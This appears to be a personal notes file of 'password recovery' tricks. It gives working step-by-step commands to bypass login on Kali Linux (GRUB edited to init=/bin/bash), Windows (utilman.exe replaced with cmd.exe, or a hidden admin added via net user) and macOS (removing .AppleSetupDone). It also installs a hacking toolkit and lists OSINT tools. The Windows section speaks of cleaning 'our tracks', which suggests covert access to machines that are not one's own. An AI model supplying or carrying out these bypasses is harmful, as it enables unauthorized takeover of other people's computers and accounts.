# cyber

**Kali Linux Password "Recovery"**
*  Reboot
*  Go to Advanced options for Kali GNU/Linux and click enter
*  Go to Kali GNU/Linux, with Linux ?.?.?-kali2-amd?? (recovery mode) and click e
*  Go to the bottom and find ro
*  Replace ro single initrd=/install/gtk/initrd.gz with rw init=/bin/bash
*  Press F10 or Ctrl + x
*  When root@(none):/# shows up type passwd root
*  Then enter a new password
*  And once more to confirm password change
*  Now type reboot -f then enter
*  Once it reboots click enter and login

**X-Tools Download**
* apt update
* apt install git
* git clone https://github.com/Rajkumrdusad/Tool-X.git
* cd Tool-X
* chmod +x install.aex
* ./install.aex
* Tool-X

**Windows Password Recovery (Works on all windows versions)**
* Plug a bootable windows 7 iso usb into the computer
* If the bootable windows 7 usb works without error skip to step 6
* Reboot the computer and press f2 heaps until the bios menu opens
* Go to settings > general > boot sequence
* Where it says Boot List Option Click UEFI and then apply then exit
* Now the windows install menu will show
* Click next once it appears
* At the bottom left click repair your computer
* Click use recovery tools .... then next
* Click command prompt
* Now you have a few choices. make a new admin account and make cmd open when ever you click the utility manager at the login screen.
* Option 1
* Type "net user /add username password" then enter
* Now type "net localgroup administrators username /add" then enter
* You are now admin
* Option 2
* Type the following then click enter
* copy c:\windows\system32\utilman.exe c:\windows\system32\utilman2.exe
* You just made a backup because we want to clean our tracks at the end
* Now type the following and click enter
* copy c:\windows\system32\cmd.exe c:\windows\system32\utilman.exe
* No you will get prompted and type yes then enter
* Finishing Up
* Now click restart and unplug the usb
* If you changed the boot option from legacy to UEFI go back and change it back
* Now when you restart wait until the login screen
* If you changed cmd to utilman follow this
* Now press the utility manager at the bottom left and boom cmd will open
* You can now do what ever you want or make an admin account like in option 1
* If you made an admin account follow this
* Login with the account you just made
* Boom admin account made
* Now you can change the old password or use the new account
* Make sure to change utilman2 to utilman and delete utilman2

**Mac Password Recovery**
* Turn off the computer
* Turn on the computer and hold command + s until the screen goes black and shows white text
* Now type "mount -uw /" then enter
* And then "rm /var/db/.Applesetupdone" then enter
* And finaly reboot by typing reboot  then enter
* Now follow the GUI menu and bam admin account created
 
 **OSINT**
 https://github.com/laramies/theHarvester
 https://hunter.io/
 https://osintframework.com/